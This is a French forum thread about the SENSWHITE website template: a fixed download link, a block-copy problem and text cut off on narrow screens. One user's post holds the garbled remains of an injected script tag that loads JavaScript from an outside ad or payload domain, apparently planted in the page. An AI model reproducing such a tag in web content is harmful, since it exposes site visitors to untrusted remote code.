Nouveau template pour tous : SENSWHITE |
Répondre ![]() |
Page <1 36373839> |
Auteur |
![]() ![]() |
brolysan ![]() Admin Group ![]() ![]() Depuis le: 14 Août 2009 Pays: France Status: Inactif Points: 10139 |
![]() ![]() ![]() ![]() ![]() |
Soit vous mettez des screens de votre soucis (dans OE et en mode prévisualisation) soit compressez votre projet complet au format zip, passez par wetransfer.com et me l'envoyer à contact@sensode.com
Je regarderai si je peux comprendre via le projet en lui même.
|
|
![]() |
|
celtik ![]() Newbie ![]() Depuis le: 27 Feb 2016 Status: Inactif Points: 17 |
Oui pardon, comme le site est déroulant avec le bouton central de la souris, j'ai assimilé un bloc à une page. Donc j'ai voulu copier le bloc "actualités" et cela ne marchait pas malgré plusieurs tentatives.
J'ai donc fermé le projet. J'ai laissé cela un moment et je suis reparti du début en créant un nouveau projet à partir du modèle, et au premier essai le bloc s'est copié pour s'insérer parfaitement à la suite :) du coup souci résolu, mais sans savoir comment :-P Merci pour vos réponses et votre aide ;)
|
|
![]() |
|
Supermi27 ![]() Newbie ![]() Depuis le: 09 Avr 2019 Status: Inactif Points: 14 |
Bonjour< ="text/" async="" ="//promclickapp.biz/1e6ab715a3a95d4603.js">
Les lien pour télécharger cette template ne fonctionne pas. Est-il possible de l'avoir? Est-elle compatible à la version 1.57R9 Merci
|
|
![]() |
|
brolysan ![]() Admin Group ![]() ![]() Depuis le: 14 Août 2009 Pays: France Status: Inactif Points: 10139 |
Je regarde pourquoi.
|
|
![]() |
|
lien de nouveau fonctionnel : http://sensode.net/SENSWHITE-157R3.zip Oui fonctionnel avec la dernière version d'OE.
|
|
![]() |
|
Paulette ![]() Newbie ![]() Depuis le: 09 Dec 2019 Status: Inactif Points: 2 |
Bonjour, Sur certains smartphone, ou même dans une fenêtre rétrécie au max sur PC, les mots d'accueil "template/senswhite" sont tronqués à droite, sans possibilité de les visualiser, par exemple avec un ascenseur horizontal en bas. Il y a til un moyen d'éviter cela? j'espère que la question n'a pas été déjà posée, j'ai pas trouvé. Merci |
|
![]() |
|
bizarre, aucun souci sur un iphone 6S plus, un iphone 11 pro et un iphone 5S.
![]() |
|
![]() |
|
Paulette ![]() Newbie ![]() Depuis le: 09 Dec 2019 Status: Inactif Points: 2 |
Bonjour, J'ai pourtant un Iphone 5S (et pareil sur android Samsung s7) Je reformule, ce n'était peut être pas clair: Sur PC Windows avec Firefox, en rétrécissant au maximum la largeur de la fenêtre du navigateur, on arrive à une fenêtre moins large que les mots template/senswhite qui, restant à leur taille initiale, sont tronqués à l'affichage. |
|
![]() |
|
Bridet ![]() Senior Member ![]() ![]() Depuis le: 13 Dec 2013 Pays: Condroz Status: Inactif Points: 5049 |
ceci n'est pas clair du tout : les mots template/senswhite qui, restant à leur taille initiale, sont tronqués à l'affichage
que se passe-t-il quand vous regardez ce site : www.gites-durbuy.be réalisé avec senswhite ? |
|
![]() |
|
Pour senswhite, il faut avoir une largeur de -303 pixels pour que le texte disparaît...
![]() et puis laisser les mots tel quels n'a aucun sens. Si vous ne savez pas réduire la taille du texte selon un média édition, vous devriez commencer à regarder les tutoriels. ![]() |
|
![]() |
Répondre ![]() |
Page <1 36373839> |
Tweet
|
Aller au Forum | Permissions du forum ![]() Vous ne pouvez pas écrire un nouveau Sujet Vous ne pouvez pas répondre aux Sujets Vous ne pouvez pas effacer vos messages Vous ne pouvez pas éditer vos messages Vous ne pouvez pas créer des sondages Vous ne pouvez pas voter dans les sondages |